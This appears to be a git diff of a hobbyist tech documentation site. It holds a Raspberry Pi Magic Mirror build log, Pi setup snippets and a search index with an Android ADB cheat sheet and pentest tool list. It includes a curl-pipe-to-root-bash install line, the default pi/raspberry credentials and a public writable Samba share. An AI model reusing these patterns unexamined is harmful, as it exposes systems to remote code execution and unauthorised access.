I've decided to test the controller for the LCD Panel inside the original iMac's body.
I've connected raspberry to the new monitor for the magicmirror testing and configuration.
Since my previous experience with my first magicmirror build, I've decided to add a Motion Sensor to the Raspberry Pi to detect the movement of the person infront of the mirror and turn the display on/off accordingly. The second thing i've added is a Power Button to turn the Raspberry Pi on, off and restart it without a physical access to the Raspberry Pi.
I couldn't find any open source projects for the functionality I needed of the power button and the Motion Sensor. So I've decided to create my own solution. Bellow are the scripts that I've created:
Thats how i've tested the functionality of the power button and the motion sensor.
I've order a reflective glass with 4 holes for mounting. It was a challenge to find a suitable reflective glass for the MagicMirror. The product I've found is not perfect - the glass is tinted, but it's a good enough solution and way better then Glass Mirror Films I've used on my first Magic Mirror Project.
After I've done all the proof of concepts
that every thing will work as i intended, I've continue to build the frame to house all the components.
I've used scrap wood I had laying around to build the frame and the mounting for the LCD panel, and the glass
For mounting the Magic Mirror to the wall i've used the smallest TV Mount I've found.
After the frame is built, I've added the electronics to the frame.
Performing senity check on the electronics, and display assembly.
Since I when on the floating
effect the glass isn't covering the all the frame, all the exposed parts of the glass are needed to be covered to avoid light leaking.
And the final Magic Mirror on the wall.
The Software The magicmiror is based on MagicMirror project. running on docker on Raspberry OS.
Below the docker compose file for your reference.
version: '3'
+
+services:
+ magicmirror:
+ image: karsten13/magicmirror
+ container_name: magicmirror
+ hostname: magicmirror
+ restart: always
+ ports:
+ - 80:8080
+ volumes:
+ - ./config:/opt/magic_mirror/config
+ - ./modules:/opt/magic_mirror/modules
+ - ./css:/opt/magic_mirror/css
+ - /tmp/.X11-unix:/tmp/.X11-unix
+ - /opt/vc:/opt/vc/:ro
+ - /sys:/sys
+ - /usr/bin/vcgencmd:/usr/bin/vcgencmd
+ - /etc/localtime:/etc/localtime
+ devices:
+ - /dev/vchiq
+ environment:
+ - LD_LIBRARY_PATH=/opt/vc/lib
+ - DISPLAY=unix:0.0
+ - TZ=Asia/Jerusalem
+ - SET_CONTAINER_TIMEZONE=true
+ - CONTAINER_TIMEZONE=Asia/Jerusalem
+ shm_size: '1024mb'
+ command:
+ - npm
+ - run
+ - start
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/projects/magic-mirror/index.html b/raspberry-pi/projects/magic-mirror/index.html
new file mode 100644
index 000000000..2d58bb4a7
--- /dev/null
+++ b/raspberry-pi/projects/magic-mirror/index.html
@@ -0,0 +1,211 @@
+ Magic Mirror - 3os raspberry-pi magic-mirror Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-06 Magic Mirror Magic Mirror Build Pictures 23" Samsung screen power resoldering:
Wooden frame initial fitting test on a glass with duel mirror film applied:
Testing the screen installation (frame removed) with power cords:
Testing black&white picture from a laptop after frame assembly:
Power, Lan, Usb external ports cutouts:
Fitted extended ports with wood filler:
Extended ports:
Assembly With screen, Raspberry Pi, cable routing, black material which do not pass light where there is no screen:
Adding some color for the frame:
Testing everything is working as it should be:
Full assembly behind the mirror:
Final Product:
Configuration Setup Change Display Rotation sudo nano /boot/config.txt
+
Add one of those according to your setup to the config file:
Code Description display_rotate=0 Normal display_rotate=1 90 degrees display_rotate=2 180 degrees display_rotate=3 270 degrees display_rotate=0x8000 horizontal flip display_rotate=0x20000 vertical flip
NOTE: You can rotate both the image and touch interface 180º by entering lcd_rotate=2 instead
Disabling the Screensaver Change to OPEN GL Driver
sudo nano /boot/config.txt
+
add this:
(Please note, you will need the x11-xserver-utils package installed.)
edit ~/.config/lxsession/LXDE-pi/autostart:
sudo nano ~/.config/lxsession/LXDE-pi/autostart
+
Add the following lines:
@xset s noblank
+@xset s off
+@xset -dpms
+
Edit /etc/lightdm/lightdm.conf:
sudo nano /etc/lightdm/lightdm.conf
+
Add the following line below [SeatDefaults]
xserver-command= X -s 0 -dpms
+
OS UI Finishes Make the Background Black:
Right click the Desktop
-> Desktop Preferences
and Change: Layout -> no image
Colour -> #000000
Hit ok.
Right click on the top panel
-> Panel Preferences
-> Appearance
Select Solid Color (With Opacity)
make sure Opacity at 0
Disable WiFi Power Save Edit /etc/modprobe.d/8192cu.conf
sudo nano /etc/modprobe.d/8192cu.conf
+
Add the following lines
# Disable power saving
+options 8192cu rtw_power_mgnt = 0 rtw_enusbss = 1 rtw_ips_mode = 1
+
For Raspberry Pi 3 Edit /etc/network/interfaces
sudo nano /etc/network/interfaces
+
Add the following line under the wlan0 section
allow-hotplug wlan0
+iface wlan0 inet manual
+wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
+wireless-power off
+
Reboot your PI
Disable Cursor on Startup sudo apt-get install unclutter
+
Installation first install node.js and npm
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
+sudo apt-get install -y nodejs
+
and then run:
sudo npm install -g npm@latest
+
If you need to remove node and npm run this:
sudo apt-get remove nodejs nodejs-legacy nodered
+
Installation:
magicmirror-installation
say no to PM2 auto start - will be install manually
To Start from SSH:
cd ~/MagicMirror && DISPLAY = :0 npm start
+
pm2 auto start installation sudo npm install -g pm2
+cd ~
+nano mm.sh
+
add this to mm.sh and save:
#!/bin/sh
+
+cd ~/MagicMirror
+DISPLAY = :0 npm start
+
chmod +x mm.sh
+pm2 start mm.sh
+pm2 save
+pm2 startup
+
pm2 commands:
pm2 restart mm
+pm2 stop mm
+pm2 start mm
+pm2 log
+pm2 show mm
+
Logrotate Installation This will Retain for 14 days compress the logs.
pm2 install pm2-logrotate
+pm2 set pm2-logrotate:compress true
+pm2 set pm2-logrotate:retain 14
+pm2 set pm2-logrotate:max_size 10M
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/snippets/index.html b/raspberry-pi/snippets/index.html
new file mode 100644
index 000000000..b0026d518
--- /dev/null
+++ b/raspberry-pi/snippets/index.html
@@ -0,0 +1,196 @@
+ Snippets - 3os raspberry-pi Snippets Enable SSH on Raspberry Pi Without a Screen Put the micro SD card into your computer You'll have to locate the boot directory at your SD card
for example:
All you have to do is create an empty file called ssh.
That's it. Insert the SD card to the Pi. You should have enabled SSH at boot.
Default User and Password After Installation User: pi
+Password: raspberry
+
Basic Configuration Update OS sudo apt-get update && sudo apt-get upgrade -y
+
Disable IPv6 on Raspberry Pi Os Edit “/etc/sysctl.confâ€:
sudo nano /etc/sysctl.conf
+
Add this to the end:
net.ipv6.conf.all.disable_ipv6=1
+net.ipv6.conf.default.disable_ipv6=1
+net.ipv6.conf.lo.disable_ipv6=1
+net.ipv6.conf.eth0.disable_ipv6 = 1
+
Save and close the file. Edit “/etc/rc.localâ€:
sudo nano /etc/rc.local
+
Add this to the end (but before “exit 0â€):
systemctl restart procps
+
Save and close the file. Reboot
Show Raspberry Temperature /opt/vc/bin/vcgencmd measure_temp
+
Samba for RaspberryPi sudo apt-get update
+sudo apt-get install -y samba samba-common-bin smbclient cifs-utils
+sudo smbpasswd -a pi ( my-pi-samba-remote-password )
+sudo nano /etc/samba/smb.conf
+
change:
workgroup = YOUR WINDOWS WORKGROUP NAME
+
add at end:
[ share]
+ path = /home/pi/Desktop/share
+ available = yes
+ valid users = pi
+ read only = no
+ browsable = yes
+ public = yes
+ writable = yes
+
the shared path must exist: ( if you work via desktop ( HDMI or VNC ) it is very convenient just to read or drop from/to this shared dir ) mkdir /home/pi/Desktop/share
Start samba Server
sudo /usr/sbin/service smbd start
+
Back to top
\ No newline at end of file
diff --git a/robots.txt b/robots.txt
new file mode 100644
index 000000000..3fa14834b
--- /dev/null
+++ b/robots.txt
@@ -0,0 +1,4 @@
+User-agent: *
+Allow: /
+
+Sitemap: https://3os.org/sitemap.xml
diff --git a/search/search_index.json b/search/search_index.json
new file mode 100644
index 000000000..c5e25919b
--- /dev/null
+++ b/search/search_index.json
@@ -0,0 +1 @@
+{"config": {"lang": ["en"], "separator": "[\\s\\-]+", "pipeline": ["stopWordFilter"]}, "docs": [{"location": "tags/", "title": "Tags and Categories", "text": ""}, {"location": "tags/#3g-modem", "title": "3g-modem", "text": " 3g Modem Host Configuration "}, {"location": "tags/#cookies", "title": "Cookies", "text": ""}, {"location": "tags/#git", "title": "Git", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#homelab", "title": "HomeLab", "text": ""}, {"location": "tags/#iid", "title": "IID", "text": " IID Generator & Validator "}, {"location": "tags/#nas", "title": "NAS", "text": " Synology NAS Free 80,443 Ports "}, {"location": "tags/#openssh", "title": "OpenSSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#proxmox", "title": "Proxmox", "text": ""}, {"location": "tags/#ssh", "title": "SSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#security", "title": "Security", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#synology", "title": "Synology", "text": ""}, {"location": "tags/#tweeks", "title": "Tweeks", "text": ""}, {"location": "tags/#ubuntu", "title": "Ubuntu", "text": ""}, {"location": "tags/#virtio", "title": "VirtIO", "text": ""}, {"location": "tags/#windows", "title": "Windows", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#windows-virtual-machines", "title": "Windows Virtual Machines", "text": ""}, {"location": "tags/#windwos", "title": "Windwos", "text": ""}, {"location": "tags/#adb", "title": "adb", "text": ""}, {"location": "tags/#admonition", "title": "admonition", "text": ""}, {"location": "tags/#affiliate", "title": "affiliate", "text": ""}, {"location": "tags/#android", "title": "android", "text": " ADB Cheat Sheet Apktool PT Application JADX Decompiler MobSF SSL Pinning Bypass "}, {"location": "tags/#apktool", "title": "apktool", "text": ""}, {"location": "tags/#application", "title": "application", "text": ""}, {"location": "tags/#autofs", "title": "autofs", "text": ""}, {"location": "tags/#automation", "title": "automation", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Syncthing Motion Sensor Display Control "}, {"location": "tags/#bash", "title": "bash", "text": " DDNS Cloudflare Bash BrewUp "}, {"location": "tags/#cheat-sheet", "title": "cheat-sheet", "text": " ADB Cheat Sheet Npm Command-line Utility PM2 - Node.js Process Manager Pip Package Manager Supervisor Process Manager Virtual Environment Ruby Gem Package Manager Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli "}, {"location": "tags/#cheatsheet", "title": "cheatsheet", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet "}, {"location": "tags/#chrome", "title": "chrome", "text": ""}, {"location": "tags/#cli", "title": "cli", "text": ""}, {"location": "tags/#clickjacking", "title": "clickjacking", "text": ""}, {"location": "tags/#cloudflare", "title": "cloudflare", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Pi-hole Cloudflare DNS Sync Let's Encrypt with Cloudflare UDM Cloudflare DDNS "}, {"location": "tags/#code-blocks", "title": "code-blocks", "text": ""}, {"location": "tags/#collation", "title": "collation", "text": ""}, {"location": "tags/#commands", "title": "commands", "text": ""}, {"location": "tags/#container", "title": "container", "text": ""}, {"location": "tags/#content-tabs", "title": "content-tabs", "text": ""}, {"location": "tags/#ddns", "title": "ddns", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell "}, {"location": "tags/#debian", "title": "debian", "text": ""}, {"location": "tags/#decompiler", "title": "decompiler", "text": ""}, {"location": "tags/#diagram", "title": "diagram", "text": ""}, {"location": "tags/#dns", "title": "dns", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Free Port 53 on Ubuntu "}, {"location": "tags/#dns-over-https", "title": "dns-over-https", "text": " Pi-hole with DOH on Docker "}, {"location": "tags/#docker", "title": "docker", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Watchtower Docker on Raspberry Pi "}, {"location": "tags/#docker-compose", "title": "docker-compose", "text": ""}, {"location": "tags/#doh", "title": "doh", "text": " Pi-hole with DOH on Docker "}, {"location": "tags/#dsm", "title": "dsm", "text": ""}, {"location": "tags/#ed25519", "title": "ed25519", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#edgerouter", "title": "edgerouter", "text": ""}, {"location": "tags/#emojis", "title": "emojis", "text": ""}, {"location": "tags/#endorsements", "title": "endorsements", "text": ""}, {"location": "tags/#extensions", "title": "extensions", "text": " Chrome Extensions Firefox Extensions "}, {"location": "tags/#external-markdown", "title": "external-markdown", "text": ""}, {"location": "tags/#files-handling", "title": "files-handling", "text": ""}, {"location": "tags/#firefox", "title": "firefox", "text": ""}, {"location": "tags/#frida", "title": "frida", "text": ""}, {"location": "tags/#gem", "title": "gem", "text": ""}, {"location": "tags/#git_1", "title": "git", "text": " Git Cli Cheat Sheet GitHub Cli "}, {"location": "tags/#github", "title": "github", "text": " Removing Sensitive Data Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli BrewUp "}, {"location": "tags/#gpu", "title": "gpu", "text": ""}, {"location": "tags/#headings", "title": "headings", "text": ""}, {"location": "tags/#history", "title": "history", "text": ""}, {"location": "tags/#homebrew", "title": "homebrew", "text": ""}, {"location": "tags/#horizontal-line", "title": "horizontal-line", "text": ""}, {"location": "tags/#htpasswd", "title": "htpasswd", "text": " htpasswd Password Generator "}, {"location": "tags/#iterm2", "title": "iTerm2", "text": ""}, {"location": "tags/#icons", "title": "icons", "text": ""}, {"location": "tags/#igpu", "title": "igpu", "text": " iGPU Passthrough to VM iGPU Split Passthrough "}, {"location": "tags/#images", "title": "images", "text": ""}, {"location": "tags/#information", "title": "information", "text": " Affiliate Disclosure Cookies Policy Website Endorsements MIT License Privacy Policy "}, {"location": "tags/#ipv6", "title": "ipv6", "text": " Disable IPv6 on Proxmox Disable IPv6 via Grub "}, {"location": "tags/#java", "title": "java", "text": ""}, {"location": "tags/#kali", "title": "kali", "text": ""}, {"location": "tags/#kali-linux", "title": "kali-linux", "text": ""}, {"location": "tags/#letsencrypt", "title": "letsencrypt", "text": " Let's Encrypt with Cloudflare "}, {"location": "tags/#license", "title": "license", "text": ""}, {"location": "tags/#links", "title": "links", "text": ""}, {"location": "tags/#linux", "title": "linux", "text": " Syncthing Better Terminal Experience Files Handling General Snippets Locales & Timezone LVM Partitions Memory & Swap SSH Hardening with SSH Keys Identify Network Interfaces "}, {"location": "tags/#lists", "title": "lists", "text": ""}, {"location": "tags/#locales", "title": "locales", "text": ""}, {"location": "tags/#lvm", "title": "lvm", "text": ""}, {"location": "tags/#macos", "title": "macOS", "text": " Applications Tweaks Enable Root User TouchID for sudo UI Tweaks Brew Snippets "}, {"location": "tags/#maco", "title": "maco", "text": " Pyenv-virtualenv Multi Version "}, {"location": "tags/#macos_1", "title": "macos", "text": " Syncthing Better Terminal Experience SSH Passphrase to Keychain Terminal Snippets BrewUp "}, {"location": "tags/#magic-mirror", "title": "magic-mirror", "text": ""}, {"location": "tags/#magicmirror", "title": "magicmirror", "text": ""}, {"location": "tags/#markdown", "title": "markdown", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages Plugin "}, {"location": "tags/#markdown-cheatsheet", "title": "markdown-cheatsheet", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#mermaid", "title": "mermaid", "text": ""}, {"location": "tags/#metasploit", "title": "metasploit", "text": ""}, {"location": "tags/#mkdocs", "title": "mkdocs", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#motion-sensor", "title": "motion-sensor", "text": " Motion Sensor Display Control "}, {"location": "tags/#mount", "title": "mount", "text": ""}, {"location": "tags/#network", "title": "network", "text": " Proxmox Networking Identify Network Interfaces Declare Locations as \"Inside Your Local Network\" "}, {"location": "tags/#node", "title": "node", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#npm", "title": "npm", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#oh-my-zsh", "title": "oh-my-zsh", "text": " Better Terminal Experience oh-my-zsh on Synology NAS "}, {"location": "tags/#package-manager", "title": "package-manager", "text": " Pip Package Manager Ruby Gem Package Manager "}, {"location": "tags/#passthrough", "title": "passthrough", "text": " GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough "}, {"location": "tags/#penetration-testing", "title": "penetration-testing", "text": " Apktool PT Application MobSF Cli Commands Collation Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Kali Linux "}, {"location": "tags/#pi-hole", "title": "pi-hole", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker "}, {"location": "tags/#pip", "title": "pip", "text": ""}, {"location": "tags/#pm2", "title": "pm2", "text": " PM2 - Node.js Process Manager "}, {"location": "tags/#portfolio", "title": "portfolio", "text": ""}, {"location": "tags/#ports", "title": "ports", "text": ""}, {"location": "tags/#powershell", "title": "powershell", "text": " DDNS Cloudflare PowerShell Windows SSH Server "}, {"location": "tags/#privacy-policy", "title": "privacy policy", "text": ""}, {"location": "tags/#process-manager", "title": "process-manager", "text": " PM2 - Node.js Process Manager "}, {"location": "tags/#processes-manager", "title": "processes-manager", "text": " Supervisor Process Manager "}, {"location": "tags/#proxmox_1", "title": "proxmox", "text": " Cloud Image Template Let's Encrypt with Cloudflare PVE Kernel Cleaner VM Disk Expander GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough Disable IPv6 on Proxmox Proxmox Networking "}, {"location": "tags/#pt", "title": "pt", "text": " Cli Commands Collation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#python", "title": "python", "text": " Pip Package Manager Supervisor Process Manager Virtual Environment Pyenv-virtualenv Multi Version "}, {"location": "tags/#quotes", "title": "quotes", "text": ""}, {"location": "tags/#raspberry-pi", "title": "raspberry-pi", "text": " Docker on Raspberry Pi External Power Button Motion Sensor Display Control Snippets 3g Modem Host Configuration Magic Mirror 2.0 Magic Mirror "}, {"location": "tags/#resume", "title": "resume", "text": ""}, {"location": "tags/#reverse-engineering", "title": "reverse-engineering", "text": ""}, {"location": "tags/#rfid", "title": "rfid", "text": " About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A "}, {"location": "tags/#rsa", "title": "rsa", "text": " SSH Hardening with SSH Keys "}, {"location": "tags/#rsa-keys", "title": "rsa-keys", "text": " SSH With RSA Keys Windows SSH Server "}, {"location": "tags/#ruby", "title": "ruby", "text": ""}, {"location": "tags/#security_1", "title": "security", "text": ""}, {"location": "tags/#servers", "title": "servers", "text": ""}, {"location": "tags/#share", "title": "share", "text": ""}, {"location": "tags/#smb", "title": "smb", "text": ""}, {"location": "tags/#snippets", "title": "snippets", "text": ""}, {"location": "tags/#ssh_1", "title": "ssh", "text": " Enable SSH Root Login SSH With RSA Keys SSH Hardening with SSH Keys "}, {"location": "tags/#ssh-server", "title": "ssh-server", "text": ""}, {"location": "tags/#ssl-pinning", "title": "ssl-pinning", "text": ""}, {"location": "tags/#submodules", "title": "submodules", "text": ""}, {"location": "tags/#supervisor", "title": "supervisor", "text": " Supervisor Process Manager "}, {"location": "tags/#syncthing", "title": "syncthing", "text": ""}, {"location": "tags/#synology_1", "title": "synology", "text": " Syncthing oh-my-zsh on Synology NAS Install VM Tools on Virtual Machine Auto DSM Config Backup Free 80,443 Ports Enable SSH Root Login SSH With RSA Keys "}, {"location": "tags/#tables", "title": "tables", "text": ""}, {"location": "tags/#template", "title": "template", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages Plugin "}, {"location": "tags/#terminal", "title": "terminal", "text": " Better Terminal Experience TouchID for sudo "}, {"location": "tags/#text-highlighting", "title": "text-highlighting", "text": ""}, {"location": "tags/#timezone", "title": "timezone", "text": ""}, {"location": "tags/#tools", "title": "tools", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#touchid", "title": "touchID", "text": ""}, {"location": "tags/#ubiquiti", "title": "ubiquiti", "text": " EdgeRouter CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#ubuntu_1", "title": "ubuntu", "text": " Disable IPv6 via Grub Remove Snap Store Unattended Upgrades "}, {"location": "tags/#udm", "title": "udm", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#unifi", "title": "unifi", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#utilities", "title": "utilities", "text": " Useful Links & Tools Wifi QR Image Generator Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#venv", "title": "venv", "text": ""}, {"location": "tags/#vgpu", "title": "vgpu", "text": ""}, {"location": "tags/#virtualization", "title": "virtualization", "text": " Cloud Image Template VM Disk Expander "}, {"location": "tags/#vmware", "title": "vmware", "text": ""}, {"location": "tags/#vmware-fusion", "title": "vmware-fusion", "text": ""}, {"location": "tags/#watchtower", "title": "watchtower", "text": ""}, {"location": "tags/#wifi", "title": "wifi", "text": ""}, {"location": "tags/#windows_1", "title": "windows", "text": " Syncthing Windows SSH Server Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#wireguard", "title": "wireguard", "text": ""}, {"location": "tags/#zsh", "title": "zsh", "text": " Better Terminal Experience "}, {"location": "android/adb-cheat-sheet/", "title": "Android ADB Cheat Sheet", "text": "ADB, Android Debug Bridge, is a command-line utility included with Google's Android SDK. ADB can control your device over USB from a computer, copy files back and forth, install and uninstall apps, run shell commands, and more. ADB is a powerful tool that can be used to control your Android device from a computer. Below are some of the most common commands you can use with ADB and their usage. You can find more information about ADB and its usage by visiting the official website.
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#common-adb-commands", "title": "Common ADB Commands", "text": "", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#push-a-file-to-download-folder-of-the-android-device", "title": "Push a file to Download folder of the Android Device", "text": "adb push example.apk /mnt/sdcard/Download/\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#lists-all-the-installed-packages-and-get-the-full-paths", "title": "Lists all the installed packages and get the full paths", "text": "adb shell pm list packages -f\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#pulls-a-file-from-android-device", "title": "Pulls a file from android device", "text": "adb pull /mnt/sdcard/Download/example.apk\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#install-apk-from-host-to-android-device", "title": "Install apk from host to Android device", "text": "adb shell install example.apk\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#install-apk-from-android-device-storage", "title": "Install apk from Android device storage", "text": "adb shell install /mnt/sdcard/Download/example.apk\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#set-network-proxy", "title": "Set network proxy", "text": "adb shell settings put global http_proxy <address>:<port>\n
Disable network proxy
adb shell settings put global http_proxy :0\n
", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#adb-basics-commands", "title": "ADB Basics Commands", "text": "Command Description adb devices Lists connected devices adb connect 192.168.2.1 Connects to adb device over network adb root Restarts adbd with root permissions adb start-server Starts the adb server adb kill-server Kills the adb server adb reboot Reboots the device adb devices -l List of devices by product/model adb -s <deviceName> <command>
Redirect command to specific device adb \u2013d <command>
Directs command to only attached USB device adb \u2013e <command>
Directs command to only attached emulator", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#logs", "title": "Logs", "text": "Command Description adb logcat [options] [filter] [filter]
View device log adb bugreport Print bug reports", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#permissions", "title": "Permissions", "text": "Command Description adb shell permissions groups List permission groups definitions adb shell list permissions -g -r List permissions details", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#package-installation", "title": "Package Installation", "text": "Command Description adb shell install <apk>
Install app adb shell install <path>
Install app from phone path adb shell install -r <path>
Install app from phone path adb shell uninstall <name>
Remove the app", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#paths", "title": "Paths", "text": "Command Description /data/data/<package name>
/databases App databases /data/data/<package name>
/shared_prefs/ Shared preferences /mnt/sdcard/Download/ Download folder /data/app Apk installed by user /system/app Pre-installed APK files /mmt/asec Encrypted apps (App2SD) /mmt/emmc Internal SD Card /mmt/adcard External/Internal SD Card /mmt/adcard/external_sd External SD Card ------- ----------- adb shell ls List directory contents adb shell ls -s Print size of each file adb shell ls -R List subdirectories recursively adb shell pm path <package name>
Get full path of a package adb shell pm list packages -f Lists all the packages and full paths", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#file-operations", "title": "File Operations", "text": "Command Description adb push <local> <remote>
Copy file/dir to device adb pull <remote> <local>
Copy file/dir from device run-as <package>
cat <file>
Access the private package files", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#phone-info", "title": "Phone Info", "text": "Command Description adb get-stat\u0435 Print device state adb get-serialno Get the serial number adb shell dumpsys iphonesybinfo Get the IMEI adb shell netstat List TCP connectivity adb shell pwd Print current working directory adb shell dumpsys battery Battery status adb shell pm list features List phone features adb shell service list List all services adb shell dumpsys activity <package>/<activity>
Activity info adb shell ps Print process status adb shell wm size Displays the current screen resolution", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#package-info", "title": "Package Info", "text": "Command Description adb shell list packages Lists package names adb shell list packages -r Lists package name + path to apks adb shell list packages -3 Lists third party package names adb shell list packages -s Lists only system packages adb shell list packages -u Lists package names + uninstalled adb shell dumpsys package packages Lists info on all apps adb shell dump <name>
Lists info on one package adb shell path <package>
Path to the apk file", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/adb-cheat-sheet/#device-related-commands", "title": "Device Related Commands", "text": "Command Description adb reboot recovery Reboot device into recovery mode adb reboot fastboot Reboot device into recovery mode adb shell screencap -p \"/path/to/screenshot.png\" Capture screenshot adb shell screenrecord \"/path/to/record.mp4\" Record device screen adb backup -apk -all -f backup.ab Backup settings and apps adb backup -apk -shared -all -f backup.ab Backup settings, apps and shared storage adb backup -apk -nosystem -all -f backup.ab Backup only non-system apps adb restore backup.ab Restore a previous backup ------- ----------- adb shell am start -a android.intent.action.VIEW -d URL Opens URL adb shell am start -t image/* -a android.intent.action.VIEW Opens gallery", "tags": ["android", "adb", "cheat-sheet"]}, {"location": "android/apktool/", "title": "Android Apktool for Reverse Engineering", "text": "A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications. It also makes working with an app easier because of the project like file structure and automation of some repetitive tasks like building apk, etc.
It is NOT
intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms, analyzing applications and much more.
", "tags": ["android", "penetration-testing", "reverse-engineering", "apktool"]}, {"location": "android/apktool/#download-and-documentation", "title": "Download and Documentation", "text": "Official Apktool Website
", "tags": ["android", "penetration-testing", "reverse-engineering", "apktool"]}, {"location": "android/apktool/#how-to-sign-apk-after-compile", "title": "How to Sign APK After Compile", "text": "In order to install modified APK on Android device, you need to sign it with a certificate. Android APK won't be signed by default. You need to sign it manually.
Install apksigner
apt install -y apksigner\n
Create certificate at the same folder you've compiled your modified APK
keytool -genkey -v -keystore keystore.jks -keyalg RSA -keysize 2048 -validity 10000\n
Enter A password (we will need it to singe the APK), enter any data you wish for the certificate information. At the end enter 'y' at the end to create the certificate.
Now we should have 2 files: your.apk, keystore.jks. The only step left is to singe the APK with new certificate.
apksigner sign --ks keystore.jks your.apk\n
When installing the APK you will be prompted with a warning of \"unknown certificate\" just hit Install.
", "tags": ["android", "penetration-testing", "reverse-engineering", "apktool"]}, {"location": "android/applications/", "title": "Penetration Testing Application for Android", "text": "List for Android penetration testing applications and tools that can be used to aid in penetration testing. The following are the most commonly used applications. Feel free to suggest new applications and tools at comments section below.
", "tags": ["android", "application", "penetration-testing"]}, {"location": "android/applications/#list-of-android-penetration-testing-tools-and-applications", "title": "List of Android Penetration Testing Tools and Applications", "text": " Magisk Manager - Systemless rooting system. EdXposed Manager - Companion Android application for EdXposed. BusyBox - Android busyBox. SQLite Editor Master - SQLite Editor. Root Explorer File Manager for Root Users (Root Required). CiLocks - Python script to brute force android lockscreen password. Network Analyzer - Network Analyzer for Android. Packet Capture - Packet capture/Network traffic sniffer. Material Terminal - Terminal for Android. Gplaycli Cli Tool to download APK form PlayStore. ", "tags": ["android", "application", "penetration-testing"]}, {"location": "android/jadx-decompiler/", "title": "JADX - Dex to Java Decompiler", "text": "Github Repository: skylot-jadx
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#about-jadx", "title": "About JADX", "text": "Command line and GUI tools for producing Java source code from Android Dex and Apk files
Please note that in most cases jadx can't decompile all 100% of the code, so errors will occur. Check Troubleshooting guide for workarounds
Main features:
decompile Dalvik bytecode to java classes from APK, dex, aar, aab and zip files decode AndroidManifest.xml
and other resources from resources.arsc
